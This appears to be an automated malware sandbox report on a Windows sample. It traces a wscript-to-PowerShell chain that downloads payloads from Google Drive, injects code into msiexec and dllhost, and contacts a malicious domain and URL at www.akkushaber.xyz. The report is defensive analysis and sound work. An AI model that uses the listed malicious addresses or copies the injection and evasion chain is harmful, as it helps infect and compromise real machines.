Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540843 Sample: EL-25-536_40005512_Le Cuivr... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 35 www.akkushaber.xyz 2->35 37 drive.usercontent.google.com 2->37 39 drive.google.com 2->39 55 Suricata IDS alerts for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 63 5 other signatures 2->63 10 powershell.exe 15 2->10         started        13 wscript.exe 1 2->13         started        signatures3 61 Performs DNS queries to domains with low reputation 35->61 process4 signatures5 69 Early bird code injection technique detected 10->69 71 Writes to foreign memory regions 10->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 10->73 75 Queues an APC in another process (thread injection) 10->75 15 msiexec.exe 6 10->15         started        19 conhost.exe 10->19         started        77 Suspicious powershell command line found 13->77 79 Wscript starts Powershell (via cmd or directly) 13->79 81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->81 83 Suspicious execution chain found 13->83 21 powershell.exe 14 19 13->21         started        process6 dnsIp7 41 142.250.185.142, 443, 49738, 49740 GOOGLEUS United States 15->41 49 Maps a DLL or memory area into another process 15->49 23 nJPhzxOixucOn.exe 15->23 injected 43 drive.google.com 142.250.185.78, 443, 49730 GOOGLEUS United States 21->43 45 drive.usercontent.google.com 142.250.186.97, 443, 49731, 49739 GOOGLEUS United States 21->45 51 Found suspicious powershell code related to unpacking or dynamic code loading 21->51 26 conhost.exe 21->26         started        signatures8 process9 signatures10 65 Maps a DLL or memory area into another process 23->65 67 Found direct / indirect Syscall (likely to bypass EDR) 23->67 28 dllhost.exe 23->28         started        process11 signatures12 85 Maps a DLL or memory area into another process 28->85 31 nJPhzxOixucOn.exe 28->31 injected process13 dnsIp14 47 www.akkushaber.xyz 104.21.70.11, 50008, 80 CLOUDFLARENETUS United States 31->47 53 Found direct / indirect Syscall (likely to bypass EDR) 31->53 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.185.78
 drive.google.com United States
15169 GOOGLEUS false
142.250.185.142
 unknown United States
15169 GOOGLEUS false
142.250.186.97
 drive.usercontent.google.com United States
15169 GOOGLEUS false
104.21.70.11
 www.akkushaber.xyz United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
www.akkushaber.xyz 104.21.70.11 true
drive.google.com 142.250.185.78 true
drive.usercontent.google.com 142.250.186.97 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.akkushaber.xyz/0mzg/?eBn8=2O13gIliMn3YsUw5a3KzRkO18CQjk9KHJ2ezAhJRRaOqIrVzHHZDa9+gXbVcJvld3ors0lI+gPWWM5QB07s0EfgV3tv6nKYxZWLGcFl7cPul4bAwfY0iYcg=&lvf=o4BpH true
    		unknown